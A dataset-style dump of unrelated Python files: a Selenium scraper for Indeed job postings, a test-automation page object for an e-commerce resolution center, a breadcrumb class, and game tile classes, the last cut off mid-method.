text
stringlengths 8
6.05M
|
|---|
# -*- coding: utf-8 -*-
"""
Created on Wed May 27 09:08:16 2020
@author: peter_goodridge
"""
from selenium import webdriver
import time
from selenium.common.exceptions import TimeoutException, ElementClickInterceptedException, NoSuchElementException, StaleElementReferenceException
import json
from datetime import datetime
import random
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import hashlib
import urllib.parse as urlparse
from urllib.parse import parse_qs
import re
from datetime import date, timedelta, datetime
#from google.cloud import bigquery
#from google.oauth2 import service_account
import pandas as pd
import os
import numpy as np
#from random_user_agent.user_agent import UserAgent
#from random_user_agent.params import SoftwareName, OperatingSystem
"""
key_path = "*********"
credentials = service_account.Credentials.from_service_account_file(
key_path,
scopes=["https://www.googleapis.com/auth/cloud-platform"],
)
"""
"""
client = bigquery.Client(
credentials=credentials,
project=credentials.project_id,
)
"""
#software_names = [SoftwareName.CHROME.value]
#operating_systems = [OperatingSystem.WINDOWS.value]
#user_agent_rotator = UserAgent(software_names=software_names,
#operating_systems=operating_systems,
#limit=100)
#user_agent = user_agent_rotator.get_random_user_agent()
def save_job_info(job_id, job_info):
fname2 = 'C:\\Indeed Temp\\' + job_id + '.json'
#fname2 = 'c:\\Indeed temp\\' + dice_id + '.json'
with open(fname2, 'w') as f:
json.dump(job_info, f)
return
def load_bq(job_info, running_jobs):
#unused but could be adapted to Azure
row = pd.DataFrame(job_info)
raw_len = len(row)
row = row.dropna()
diffs = raw_len - len(row)
print('There were {} total jobs and we returned {} jobs'.format(running_jobs, raw_len))
print("{} Jobs were droppped because of nulls".format(diffs))
row.to_gbq('DW__test.raw_job_postings_tech', credentials = credentials, project_id = credentials.project_id, if_exists = 'append')
table = client.get_table('DW__test.indeed_scraping_results')
client.insert_rows(table, [(datetime.timestamp(datetime.now()), running_jobs, raw_len, diffs)])
def length_check(element):
if len(element) >=1:
return element[0].text
else:
print('element not found')
return ''
def get_date(date_raw):
try:
if date_raw.lower().strip() in ['today', 'just posted']:
lag = 0
elif date_raw:
regex = re.compile('(\d+)')
string_raw = re.match(regex, date_raw).group(1)
lag = int(string_raw)
else:
print('no date no error')
lag = 0
job_date = date.today() - timedelta(lag)
job_date = job_date.strftime('%m/%d/%Y')
except Exception as e:
print("Error: " + str(e))
print('no date', date_raw)
job_date = date.today().strftime('%m/%d/%Y')
return job_date
def get_card_info(cards, card_id):
company = length_check(cards[card_id].find_elements_by_class_name('companyName'))
location = length_check(cards[card_id].find_elements_by_class_name('companyLocation'))
#date = length_check(cards[card_id].find_elements_by_class_name('date'))
title = length_check(cards[card_id].find_elements_by_xpath('//h2[contains(@class,"jobTitle ")]'))
card_info = {'company': company, 'date': get_date(date), 'location': location, 'job_title': title}
return card_info
def get_job_info(driver_instance, job_data, state, job_desc):
#WebDriverWait(driver, 120).until(EC.presence_of_element_located((By.ID, "vjs-tab-job")))
#print('job_desc: ', driver2.find_elements_by_class_name('jobsearch-jobDescriptionText'))
#if len(driver_instance.find_elements_by_id('vjs-tab-job')) > 0:
#job_desc = driver_instance.find_elements_by_id('vjs-tab-job')
#else:
#WebDriverWait(driver, 180).until(EC.presence_of_element_located((By.ID, "vjs-tab-job")))
#WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.ID, "jobsearch-JobComponent-embeddedBody")))
#job_desc = driver_instance.find_elements_by_class_name('jobsearch-jobDescriptionText')
url = driver_instance.current_url#after a redirect, we'll get the short url that should always have the job_id
print('Cur url: ', url)
unique_name = job_data['job_title']+job_data['company']+job_data['location']
print(unique_name)
if len(unique_name) > 1 and len(job_desc) > 0:#only save if we have a valid title and employer
job_id = hashlib.md5(unique_name.encode('utf-8')).hexdigest()
parsed = urlparse.urlparse(url)
try:
true_job_id = parse_qs(parsed.query).get('vjk')[0]
except Exception as e:
print("Error: " + str(e))
true_job_id = parse_qs(parsed.query).get('jk')[0]
print('true Job ID:', true_job_id)
if true_job_id:
true_id = 1
else:
true_id = 0
true_job_id = ''
job_info = {
'job_desc' : job_desc,
#'company': length_check(company),
#'location': length_check(location),
#'job_title' : length_check(job_title),
'job_id': job_id,
'url': url,
#'job_date': get_date(date_raw),
'scrape_time': datetime.timestamp(datetime.now()),
'skill': 'technology', #eventually, we'll exapnd to HT, ENG, etc.
'state': state,
'true_job_id': true_job_id,
'true_id': true_id
}
job_info.update(job_data)
save_job_info(job_info['true_job_id'], job_info)
return
print('Problem with a job!!!')
def initialize_driver():
#user_agent = user_agent_rotator.get_random_user_agent()
options = Options()
#options.add_argument('--headless')
#options.add_argument(f'user agent={user_agent}')
fp = webdriver.FirefoxProfile()
#fp.set_preference("general.useragent.override", user_agent)
fp.set_preference("geo.enabled", False)#so Dice doesn't change the URL you pass it
fp.set_preference('browser.cache.memory.enable', False)
#fp.set_preference('network.cookie.cookieBehavior', 2)
#fp.set_preference('headless', True)
driver = webdriver.Firefox(options = options, firefox_profile = fp)
driver.delete_all_cookies()
driver.set_window_size(1600, 900)
return driver
def time_filter(driver, query, state):
try:
driver.find_element_by_id('text-input-where').clear()
except:
driver.find_element_by_id('text-input-where').clear()
finally:
driver.find_element_by_id('text-input-where').clear()
#where.send_keys('anywhere')
search_bar = driver.find_elements_by_id('text-input-what')
search_bar[0].send_keys(query)
time.sleep(1)
#search_bar[0].submit()
#time.sleep(3)
where_bar = driver.find_elements_by_id('text-input-where')
where_bar[0].send_keys(state)
time.sleep(1)
where_bar[0].submit()
time.sleep(3)
date_posted_filter = driver.find_elements_by_id('filter-dateposted')
if len(date_posted_filter) > 0: #if there are no jobs, there is no filter
date_posted_filter[0].click()
time.sleep(1)
driver.find_element_by_partial_link_text('24 hours').click()
def get_accounts(path, file_name):
return pd.read_csv(path + file_name, encoding='latin1')
def get_days_diff(client):
#Not used. I believe this was used to fill in dates when the date was null
import datetime
q1 = """
select distinct date
from DW__test.raw_job_postings
;
"""
dates = client.query(q1).result().to_dataframe()
def convert_date(x):
return datetime.datetime.strptime(x, '%m/%d/%Y').date()
dates['date'] = dates['date'].map(lambda x: convert_date(x))
last_date = dates.max()[0]
diff = (datetime.date.today() - last_date).days
return diff
def get_temp(directory):
all_listings=[]
for _, _, files in os.walk(directory):
for file in files:
file_name = os.path.join(directory, file)
with open(file_name, 'r') as f:
data = json.load(f)
if not data.get('date'):
data['date'] = date.fromtimestamp(data['scrape_time']).strftime('%m/%d/%Y')
all_listings.append(data)
return pd.DataFrame(all_listings)
def delete_temp(directory):
for _, _, files in os.walk(directory):
for file in files:
file_name = os.path.join(directory, file)
os.remove(file_name)
def create_search_entry(key_word='technology'):
#Not used because not restricting salary range
salary = random.choice(list(range(0,91)))
return '{}'.format(key_word, salary)
def create_direct(state, keyword='banking'):
#salary = random.choice(list(range(80,91)))
base_string = 'https://www.indeed.com/jobs?q={}&l={}&fromage=30&filter=0'
return base_string.format(keyword, state)
def x_note(driver, html_type, identifier):
if html_type == 'class_name':
cookie_note = driver.find_elements_by_class_name(identifier)
elif html_type == 'id':
cookie_note = driver.find_elements_by_id(identifier)
else:
print('use a different html_type')
time.sleep(1)
if len(cookie_note) > 0:
cookie_note[0].click()
def scrape_link(driver, links, link_ids):
time.sleep(np.random.uniform(4,10))
random.shuffle(link_ids)
if len(link_ids) > 0:
link_id = link_ids.pop()
else:
return 'break'
try:
card_info = get_card_info(links, link_id)
if card_info['job_title'] == '':
raise ElementClickInterceptedException
print(card_info['company'], card_info['location'])
#job_link = driver.find_element_by_xpath('//h2//a[@href]')
#job_link.click()
links[link_id].click()
#iframes no longer used
#driver.switch_to.frame('vjs-container-iframe')
time.sleep(2)
job_desc = driver.find_elements_by_id('jobDescriptionText')[0].text
except ElementClickInterceptedException:
time.sleep(4)
driver.refresh()
print('page reload')
time.sleep(3)
links = driver.find_elements_by_xpath('//ul[@class="{}"]//li/div[contains(@class,"cardOutline")]'.format('jobsearch-ResultsList css-0'))
link_ids = list(range(len(links)))
random.shuffle(link_ids)
#link_id = link_ids.pop()
try:
card_info = get_card_info(links, link_id)
if card_info['job_title'] == '':
raise ElementClickInterceptedException('Add still blocking')
#job_link = driver.find_element_by_xpath('//h2//a[@href]')
#job_link.click()
#links[link_id].click()
links[link_id].click()
#I didn't see iframes used
#driver.switch_to.frame('vjs-container-iframe')
time.sleep(2)
job_desc = driver.find_elements_by_id('jobDescriptionText')[0].text
except Exception as e:
print("Error: " + str(e))
time.sleep(4)
driver.refresh()
print('page reload')
time.sleep(3)
links = driver.find_elements_by_xpath('//ul[@class="{}"]//li/div[contains(@class,"cardOutline")]'.format('jobsearch-ResultsList css-0'))
link_ids = list(range(len(links)))
random.shuffle(link_ids)
#link_id = link_ids.pop()
card_info = get_card_info(links, link_id)
links[link_id].click()
if len(driver.find_elements_by_id('vjs-container-iframe')) > 0:
driver.switch_to.frame('vjs-container-iframe')
time.sleep(2)
job_desc = driver.find_elements_by_id('jobDescriptionText')[0].text
else:
bad_frames.append(card_info)
return 'continue'
#job_link = driver.find_element_by_xpath('//h2//a[@href]')
#links[link_id].click()
#job_link.click()
#company_jobs = get_job_info(driver2, card_info, duns_id, company_jobs)
get_job_info(driver, card_info, state, job_desc)
driver.switch_to.parent_frame()
print('jobs done')
return 'done'
#time.sleep(random.uniform(0,1))
def change_page(driver):
try:
pagination = driver.find_elements_by_xpath('//span[@class="pagination-page-next"]')
if len(pagination) == 2:
pagination[1].click()
elif len(pagination) == 1:
pagination[0].click()
else:
return 'break'
except ElementClickInterceptedException:
#ads...
#restart_driver(driver, p_num+starting_point)
driver.refresh()
print('page reload')
pagination = driver.find_elements_by_xpath('//span[@class="pagination-page-next"]')
if len(pagination) == 2:
pagination[1].click()
elif len(pagination) == 1:
pagination[0].click()
else:
return 'break'
except Exception as e:
#ads...
#restart_driver(driver, p_num+starting_point)
print("Error: " + str(e))
driver.refresh()
print('page reload')
pagination = driver.find_elements_by_xpath('//span[@class="pagination-page-next"]')
if len(pagination) == 2:
pagination[1].click()
elif len(pagination) == 1:
pagination[0].click()
else:
return 'break'
#search_string = {'q' : 'company:(COTTAGE HEALTH)'}
#url = urllib.parse.urlencode(search_string)
#regex = re.compile('(page \d+ of )(\d+,?\d*)')
regex = re.compile('(\d+)')
running_jobs=0
bad_frames=[]
driver = initialize_driver()
#Search more groups of states if needed
#Because "Banking" will return many jobs searching over multiple state groups
#should be split accross sessions.
state_list = [
["MA", "NH"]
]
states = state_list[0]
for state in states:
print(state)
#if random.choice(range(1,5)) == 1:
#driver.quit()
#driver = initialize_driver(user_agent_rotator)
#if skill == 'Salesforce':
#search_string = {'q' : '"{}" title:salesforce'.format(skill)}
#else:
#search_string = {'q' : 'company:({})'.format(account)}
print(create_search_entry())
#url = urllib.parse.urlencode(search_string)
#company_jobs = [] #this will be loaded into GCP
p_num = 1
while True:
time.sleep(np.random.uniform(1,5))
page_abs = 0 + p_num
job_num = page_abs*10
if p_num >=75:
break
if p_num == 1:
#driver.get('http://indeed.com')
#time_filter(driver, create_search_entry(), state)
driver.get(create_direct(state))
x_note(driver, 'class_name', 'gnav-CookiePrivacyNoticeButton')
#full_url = 'https://www.indeed.com/jobs?{}+${},000%2B&fromage={}'.format(url, random.choice([80,81,82,83,84,85]), job_age)
#print(full_url)
#driver.get(full_url)
#total_jobs_raw = driver.find_elements_by_xpath('//*[@id="searchCountPages"]')
total_jobs_class = 'jobsearch-JobCountAndSortPane-jobCount'
total_jobs_raw = driver.find_elements_by_xpath('//div[@class="{}"]'.format(total_jobs_class))
tos = driver.find_elements_by_css_selector('.tos-Button')
print('tos:', tos)
if len (tos) > 0:
tos[0].click()
print(total_jobs_raw)
if len(total_jobs_raw) > 0:
total_jobs_string = total_jobs_raw[0].text
string_raw = re.match(regex, total_jobs_string.lower()).group(1)
total_jobs = int(string_raw.replace(',', ''))
running_jobs += total_jobs
total_pages = total_jobs//10 + 1
else:
break
"""
if p_num % 10 == 0:
#to free up memeory
time.sleep(5)
driver = restart_driver(driver, page_abs, account)
"""
time.sleep(3)
#class_name = 'mosaic-jobcards'
#links = driver.find_elements_by_xpath('//div[@class="{}"]//h2//a[@href]'.format(class_name))
links = driver.find_elements_by_xpath('//ul[@class="{}"]//li/div[contains(@class,"cardOutline")]'.format('jobsearch-ResultsList css-0'))
#for link in links:
# hrefs.append(links[1].get_attribute('href'))
link_ids = list(range(len(links)))
print(len(links))
for i in range(len(link_ids)):
try:
result = scrape_link(driver, links, link_ids)
if result == 'continue':
continue
elif result == 'break':
print('break from inner loop!!!')
break
except StaleElementReferenceException:
links = driver.find_elements_by_xpath('//ul[@class="{}"]//li/div[contains(@class,"cardOutline")]'.format('jobsearch-ResultsList css-0'))
result = scrape_link(driver, links, link_ids)
if result == 'continue':
continue
elif result == 'break':
print('break from inner loop!!!')
print('yolo')
break
except Exception as e:
print(e)
driver.refresh()
time.sleep(4)
print('break from inner loop!!!')
print('yolo')
break
try:
page_result = change_page(driver)
if page_result == 'break':
print('break from outer loop!!!')
time.sleep(5)
break
elif page_result == 'continue':
print('break from outer loop!!!')
time.sleep(5)
continue
except Exception as e:
page_result = change_page(driver)
print("Error: " + str(e))
if page_result == 'break':
print('break from outer loop!!!')
time.sleep(5)
break
elif page_result == 'continue':
continue
p_num+=1
print("Starting Page{}".format(p_num))
dupe_text = driver.find_elements_by_class_name('dupetext')
if p_num > total_pages or len(dupe_text) > 0:
break
#load_bq(company_jobs)
#all_jobs = get_temp('/home/peter_goodridge/indeed-scraping/Indeed temp/')
#load_bq(all_jobs, running_jobs)
#delete_temp('/home/peter_goodridge/indeed-scraping/Indeed temp/')
|
import os,sys, time
from main.page.base import *
from main.function.general import *
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium import webdriver
from random import randint
import time
import re
import math
class ResolutionCenter(BasePage):
_pl = "resolution-center.pl"
#locator path
_menu_reso_center = (By.XPATH, "/html/body/div[1]/div[5]/div/div[1]/ul/li[1]/div[2]/div/ul/li[6]/a")
_list_reso_log = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/div[3]/div[1]/div/table")
_shop_name = (By.XPATH, ".//*[@id='resolution-23918']/div[2]/div/p/span[3]/a")
_status_reso2 = (By.XPATH, ".//*[@id='all-dispute-list']")
_counter_complain_from_buyer = (By.XPATH, ".//*[@id='as-seller-link']/span/span")
_counter_all_page = (By.XPATH, ".//*[@id='all-dispute-list']/div[2]/div[1]/div/small/b[2]")
_inv_reso_detail = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div[2]/div[2]/div/p/a")
_next_page = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/div[3]/div[2]/div[2]/div/div/ul/li[4]/a/strong")
_detail_textarea_loc = (By.XPATH, "//textarea[@id='reply-textarea']")
_detail_button_submit = (By.XPATH, ".//*[@id='submit-comment']")
_detail_upload_files = (By.XPATH, ".//*[@id='pickfiles']")
_detail_edit_solution = (By.ID, "edit-solution")
_detail_confirm_solution = (By.ID, "confirm-solution")
_button_confirm_solution = (By.XPATH, ".//*[@id='rf']/div/button[2]")
### What problem occur in the order ?
# The Quantity is different
_detail_checkbox_1_of_3 = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div[2]/form/div/div[6]/div[2]/div/div/div[3]/label[1]/input")
# Send remaining product
_detail_checkbox_2_of_3 = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/form/div/div[6]/div[4]/div/ul/li[3]/label/input")
_change_other_checkbox_up = (By.XPATH, ".//*[@id='trouble-box']/div/div[3]/label[1]/input")
### What solution you want ?
_change_other_checkbox_down = (By.XPATH, ".//*[@id='trouble-box']/div/div[3]/label[1]/input")
_complaint_time = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div[2]/div[2]/div/p/span[1]")
_response_checkbox_up = (By.XPATH, ".//*[@id='trouble-box']/div/div/label")
_response_checkbox_up_2 = (By.XPATH, ".//*[@id='trouble-box']/div/div/label/input")
_response_checkbox_down = (By.XPATH, ".//*[@id='solution-choice-div']/div[4]/div/ul/li/label")
_problem_1_loc = (By.XPATH, ".//*[@id='trouble-box']/div/div[2]/label[1]/input")
_problem_2_loc = (By.XPATH, ".//*[@id='trouble-box']/div/div[2]/label[2]/input")
_problem_3_loc = (By.XPATH, ".//*[@id='trouble-box']/div/div[3]/label[1]/input")
_problem_4_loc = (By.XPATH, ".//*[@id='trouble-box']/div/div[3]/label[2]/input")
_total_invoice_s1 = (By.XPATH, ".//*[@id='solution-choice-div']/div[4]/div/ul/li[1]/div/span")
_total_invoice_s3 = (By.XPATH, ".//*[@id='solution-choice-div']/div[4]/div/ul/li[4]/div/span")
_total_invoice_s4 = (By.XPATH, ".//*[@id='ship_fee_span']")
_fill_amount_refund_money_s1 = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/form/div/div[6]/div[4]/div/ul/li[1]/div/input")
_fill_amount_refund_money_s3 = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/form/div/div[6]/div[4]/div/ul/li[4]/div/input")
_fill_amount_refund_money_s4 = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/form/div/div[6]/div[3]/input")
#_total_invoice = (By.XPATH, "/html/body/div[1]/div[5]/div/div[2]/div/form/div/div[6]/div[4]/div/ul/li[1]/div/span/strong")
_solution_1_loc = (By.XPATH, ".//*[@id='refund-sol']")
_solution_2_loc = (By.XPATH, ".//*[@id='retur-good']")
_solution_3_loc = (By.XPATH, ".//*[@id='retur-refund']")
_solution_4_loc = (By.XPATH, ".//*[@id='send-remain']")
_solution_5_loc = (By.XPATH, ".//*[@id='solution-choice-div']/div[3]/input")
_dict_problem = {
'problem_1_Text' : 'Product not same as description',
'problem_2_Text' : 'Product is broken',
'problem_3_Text' : 'The Quantity is different',
'problem_4_Text' : 'Shipping agency is different'
}
_dict_solution_ = {
'solution_1_Text' : 'Refund Money',
'solution_2_Text' : 'Return product as order',
'solution_3_Text' : 'Return product and refund',
'solution_4_Text' : 'Send remaining product'
}
def open(self, site=""):
self._open(site, self._pl)
def view_complaint(self, driver, inv):
cond = False
try:
WebDriverWait(driver, 10).until(EC.presence_of_element_located(self._status_reso2))
#self.check_visible_element(*self._status_reso2)
status_temp = self.driver.find_element(*self._status_reso2)
if status_temp.is_displayed():
if ("Tidak ada data resolusi" in status_temp.text or "No Resolution Data" in status_temp.text):
print("No Resolution Data")
else:
counter = int(self.driver.find_element(*self._counter_complain_from_buyer).text)
sum_page = int(self.driver.find_element(*self._counter_all_page).text)
total_page = math.ceil(sum_page/10)
x, y, z = 0, int(counter/10), int(counter%10)
if(z > 0):
y += 1
while x < y and not cond:
print("\n")
print("You are in Resolution Center page, in My Complaint tab section")
print("Page", [int(x+1)], "of", [total_page])
list_reso = self.find_elements(*self._list_reso_log)
for i in list_reso:
if inv in i.text:
time.sleep(2)
id_reso = i.find_element(By.TAG_NAME, "tr").get_attribute("id")
ticket_reso = self.find_element(By.XPATH, "//*[@id='"+id_reso+"']")
ticket_reso.click()
time.sleep(2)
shop_name_reso = self.driver.find_element(By.XPATH, ".//*[@id='resolution-"+id_reso+"']/div[2]/div/p/span[3]/a").text
inv_number = self.driver.find_element(*self._inv_reso_detail).text
time_complain = self.driver.find_element(*self._complaint_time).text
if (inv_number == inv):
print ("The ticket resolution is valid in detail page")
print("Shop name : ", shop_name_reso," | ", inv_number )
print("Complaint Create Time : ", time_complain)
cond = True
break
time.sleep(1)
x += 1
if(x < y and not cond):
self.next_page()
print("Next page Resolution Center")
time.sleep(2)
if(not cond):
print("Resolution ticket like ", inv , "is Not Found!\n")
except Exception as inst:
print(inst)
def fill_message_and_choose_problem(self, driver, reply_comment, choose_problem, total_shipping_fee):
print ("Trying to choose Problem...")
#WebDriverWait(driver, 10).until(EC.presence_of_element_located(self._detail_textarea_loc))
input_comment = self.driver.find_element(*self._detail_textarea_loc)
input_comment.clear()
input_comment.send_keys(reply_comment)
self.driver.find_element(*self._detail_edit_solution).click()
time.sleep(2)
self.desc_problem = choose_problem
while switch(choose_problem):
if case(1):
responsiblity_checkbox_1 = self.find_elements(*self._response_checkbox_up)
for i in responsiblity_checkbox_1:
cond1 = self._dict_problem['problem_1_Text']
if cond1 in i.text:
time.sleep(1)
self.driver.find_element(*self._problem_1_loc).click()
time.sleep(4)
check_validate_p1 = self.find_element(*self._problem_1_loc).get_attribute("checked")
if check_validate_p1 == "true":
print ("Other checkbox option of solution like - Product not same as description- is Checked")
else:
print ("**** Other checkbox option of solution like - Product not same as description- is NOT Checked !!!")
break
if case(2):
responsiblity_checkbox_2 = self.find_elements(*self._response_checkbox_up)
for i in responsiblity_checkbox_2:
cond2 = self._dict_problem['problem_2_Text']
if cond2 in i.text:
time.sleep(4)
self.driver.find_element(*self._problem_2_loc).click()
time.sleep(4)
check_validate_p2 = self.find_element(*self._problem_2_loc).get_attribute("checked")
if check_validate_p2 == "true":
print ("Other checkbox option of solution like -Product is broken- is Checked")
else:
print ("**** Other checkbox option of solution like -Product is broken- is NOT Checked !!!")
break
if case(3):
responsiblity_checkbox_3 = self.find_elements(*self._response_checkbox_up)
for i in responsiblity_checkbox_3:
cond3 = self._dict_problem['problem_3_Text']
if cond3 in i.text:
time.sleep(1)
self.driver.find_element(*self._problem_3_loc).click()
time.sleep(4)
check_validate_p3 = self.find_element(*self._problem_3_loc).get_attribute("checked")
if check_validate_p3 == "true":
print ("Other checkbox option of solution like -The Quantity is different- is Checked")
else:
print ("**** Other checkbox option of solution like -The Quantity is different- is NOT Checked !!!")
break
if case(4):
responsiblity_checkbox_4 = self.find_elements(*self._response_checkbox_up)
for i in responsiblity_checkbox_4:
self.cond4 = self._dict_problem['problem_4_Text']
if self.cond4 in i.text:
time.sleep(1)
self.driver.find_element(*self._problem_4_loc).click()
time.sleep(2)
check_validate_p4 = self.find_element(*self._problem_4_loc).get_attribute("checked")
if check_validate_p4 == "true":
print ("Other checkbox option of solution like -Shipping agency is different- is Checked")
else:
print ("**** Other checkbox option of solution like -Shipping agency is different- is NOT Checked !!! \n Please Check It")
print ("\nTrying to insert Total Shiping Fee...\n")
time.sleep(1)
getnum= self.driver.find_element(*self._total_invoice_s4)
enum = getnum.find_element(By.TAG_NAME, "strong").text
splitnum = enum.split(".")
join = "".join(splitnum)
current_amount = int(re.search(r'\d+', join).group())
self.driver.find_element(*self._fill_amount_refund_money_s4).clear()
self.driver.find_element(*self._fill_amount_refund_money_s4).send_keys(total_shipping_fee)
time.sleep(1)
if current_amount < int(total_shipping_fee):
print ("Error, Current amount that you filled out is greater than Rp "+str(current_amount)+",-")
print ("Your current emount is Rp "+total_shipping_fee+",-")
os._exit(1)
else:
self.driver.find_element(*self._detail_confirm_solution).click()
self.driver.find_element(*self._button_confirm_solution).click()
time.sleep(4)
self.driver.find_element(*self._detail_edit_solution).click()
time.sleep(1)
result_amount = self.driver.find_element(*self._fill_amount_refund_money_s4).get_attribute("value")
if (total_shipping_fee != result_amount):
print("Refund money and actual refund money is not same")
else:
print ("Checkbox option of solution as input shipping fee has been succesfully inserted")
print ("================================")
self.validate_problem()
print ("Attempt amount is Rp "+total_shipping_fee+",-")
print ("Result amount is Rp " +result_amount+",-")
print ("================================")
print ("Solution succesfully changed")
print ("All process finished")
os._exit(1)
break
def choose_solution(self, driver, choose_solution, fill_refund_money):
print ("\nTrying to choose Solution...\n")
self.solution = choose_solution
while switch(choose_solution):
if case(1):
responsiblity_checkbox_1 = self.find_elements(*self._response_checkbox_down)
for i in responsiblity_checkbox_1:
cond = self._dict_solution_['solution_1_Text']
if cond in i.text:
time.sleep(1)
self.driver.find_element(*self._solution_1_loc).click()
time.sleep(1)
getnum= self.driver.find_element(*self._total_invoice_s1)
enum = getnum.find_element(By.TAG_NAME, "strong").text
splitnum = enum.split(".")
join = "".join(splitnum)
current_amount = int(re.search(r'\d+', join).group())
self.driver.find_element(*self._fill_amount_refund_money_s1).clear()
self.driver.find_element(*self._fill_amount_refund_money_s1).send_keys(fill_refund_money)
time.sleep(2)
if current_amount < int(fill_refund_money):
print ("Error, Current amount that you filled out is greater than Rp "+str(current_amount)+",-")
print ("Your current emount is Rp "+fill_refund_money+",-")
os._exit(1)
else:
self.driver.find_element(*self._detail_confirm_solution).click()
self.driver.find_element(*self._button_confirm_solution).click()
time.sleep(4)
self.driver.find_element(*self._detail_edit_solution).click()
time.sleep(1)
result_amount = self.driver.find_element(*self._fill_amount_refund_money_s1).get_attribute("value")
check_validate_s1 = self.find_element(*self._solution_1_loc).get_attribute("checked")
if check_validate_s1 == "true":
if (fill_refund_money != result_amount):
print("Refund money and actual refund money is not same")
else:
print ("Checkbox option of solution like -Shipping agency is different- is Checked")
print ("================================")
self.validate_problem()
print ("The solution is "+ cond)
print ("Attempt amount is Rp "+fill_refund_money+",-")
print ("Result amount is Rp " +result_amount+",-")
print ("================================")
print ("Solution succesfully changed")
print ("All process finished")
else:
print ("**** Other checkbox option of solution like -Shipping agency is different- is NOT Checked !!!")
break
if case(2):
responsiblity_checkbox_2 = self.find_elements(*self._response_checkbox_down)
for i in responsiblity_checkbox_2:
cond = self._dict_solution_['solution_2_Text']
if cond in i.text:
time.sleep(1)
self.driver.find_element(*self._solution_2_loc).click()
time.sleep(1)
self.driver.find_element(*self._detail_confirm_solution).click()
self.driver.find_element(*self._button_confirm_solution).click()
time.sleep(4)
self.driver.find_element(*self._detail_edit_solution).click()
check_validate_s2 = self.find_element(*self._solution_2_loc).get_attribute("checked")
if check_validate_s2 == "true":
print ("Checkbox option of solution like -Return product as order- is Checked")
print ("================================")
self.validate_problem()
print ("The solution is "+ cond)
print ("================================")
print ("Solution succesfully changed")
print ("All process finished")
else:
print ("**** Checkbox option of solution like -Return product as order- is NOT Checked !!!")
break
if case(3):
responsiblity_checkbox_3 = self.find_elements(*self._response_checkbox_down)
for i in responsiblity_checkbox_3:
cond = self._dict_solution_['solution_3_Text']
if cond in i.text:
time.sleep(1)
self.driver.find_element(*self._solution_3_loc).click()
time.sleep(1)
getnum= self.driver.find_element(*self._total_invoice_s3)
enum = getnum.find_element(By.TAG_NAME, "strong").text
splitnum = enum.split(".")
join = "".join(splitnum)
current_amount = int(re.search(r'\d+', join).group())
self.driver.find_element(*self._fill_amount_refund_money_s3).clear()
self.driver.find_element(*self._fill_amount_refund_money_s3).send_keys(fill_refund_money)
time.sleep(2)
if current_amount < int(fill_refund_money):
print ("Error, Current amount that you filled out is greater than Rp "+str(current_amount)+",-")
print ("Your current emount is Rp "+fill_refund_money+",-")
os._exit(1)
else:
self.driver.find_element(*self._detail_confirm_solution).click()
self.driver.find_element(*self._button_confirm_solution).click()
time.sleep(4)
self.driver.find_element(*self._detail_edit_solution).click()
time.sleep(1)
result_amount = self.driver.find_element(*self._fill_amount_refund_money_s3).get_attribute("value")
check_validate_s1 = self.find_element(*self._solution_3_loc).get_attribute("checked")
if check_validate_s1 == "true":
if (fill_refund_money != result_amount):
print("Refund money and actual refund money is not same")
else:
print ("Checkbox option of solution like -Return product and refund- is Checked")
print ("================================")
self.validate_problem()
print ("The solution is "+ cond)
print ("Attempt amount is Rp "+fill_refund_money+",-")
print ("Result amount is Rp " +result_amount+",-")
print ("================================")
print ("Solution succesfully changed")
print ("All process finished")
else:
print ("**** Other checkbox option of solution like -Return product and refund- is NOT Checked !!!")
break
if case(4):
responsiblity_checkbox_2 = self.find_elements(*self._response_checkbox_down)
for i in responsiblity_checkbox_2:
cond = self._dict_solution_['solution_4_Text']
if cond in i.text:
time.sleep(1)
self.driver.find_element(*self._solution_4_loc).click()
time.sleep(1)
self.driver.find_element(*self._detail_confirm_solution).click()
self.driver.find_element(*self._button_confirm_solution).click()
time.sleep(4)
self.driver.find_element(*self._detail_edit_solution).click()
check_validate_s2 = self.find_element(*self._solution_4_loc).get_attribute("checked")
if check_validate_s2 == "true":
print ("Checkbox option of solution like -Send remaining product- is Checked")
print ("================================")
self.validate_problem()
print ("The solution is "+ cond)
print ("================================")
print ("Solution succesfully changed")
print ("All process finished")
else:
print ("**** Checkbox option of solution like -Return product as order- is NOT Checked !!!")
break
def next_page(self):
try:
next_other_page = self.driver.find_element(*self._next_page)
next_other_page.click()
time.sleep(2)
except Exception as inst:
print(inst)
def validate_problem(self):
if self.desc_problem == 1:
print ("The problem is Product not same as description")
elif self.desc_problem == 2:
print ("The problem is Product is broken")
elif self.desc_problem == 3:
print ("The problem is The Quantity is different")
elif self.desc_problem == 4:
print ("The problem is Shipping agency is different")
|
class BreadCrumb:
def __init__(self, name, href):
self.name = name
if href == '/':
self.href = href
else:
self.href = '/' + str(href) + '/'
|
import GameLogic.Unit
from GameLogic.Barrack import BaseBarrack
from GameLogic.Character import *
from Vector2 import Vector2
class Tile:
def __init__(self, _position: Vector2, _basicMoney: int, _enemyMoney: int):
self._position = _position
self._basicMoney = _basicMoney
self._enemyMoney = _enemyMoney
self._building = None
self._unit = None
@property
def Building(self):
return self._building
@Building.setter
def Building(self, value):
if value is not None and self._building is not None:
raise Exception("there is already a building on this Tile")
self._building = value
@property
def Unit(self) -> GameLogic.Unit.Unit:
return self._unit
@Unit.setter
def Unit(self, value: GameLogic.Unit.Unit):
self._unit = value
@property
def Position(self) -> Vector2:
return self._position
@property
def BasicMoney(self) -> int:
return self._basicMoney
@property
def EnemyMoney(self) -> int:
return self._enemyMoney
def GetMoney(self, player):
return 0
class DesertTile(Tile):
def __init__(self, _position):
super().__init__(_position, 50, 100)
def GetMoney(self, player):
if type(player.Character) is DesertCharacter:
return self.BasicMoney
else:
return self.EnemyMoney
class ForestTile(Tile):
def __init__(self, _position):
super().__init__(_position, 50, 100)
def GetMoney(self, player):
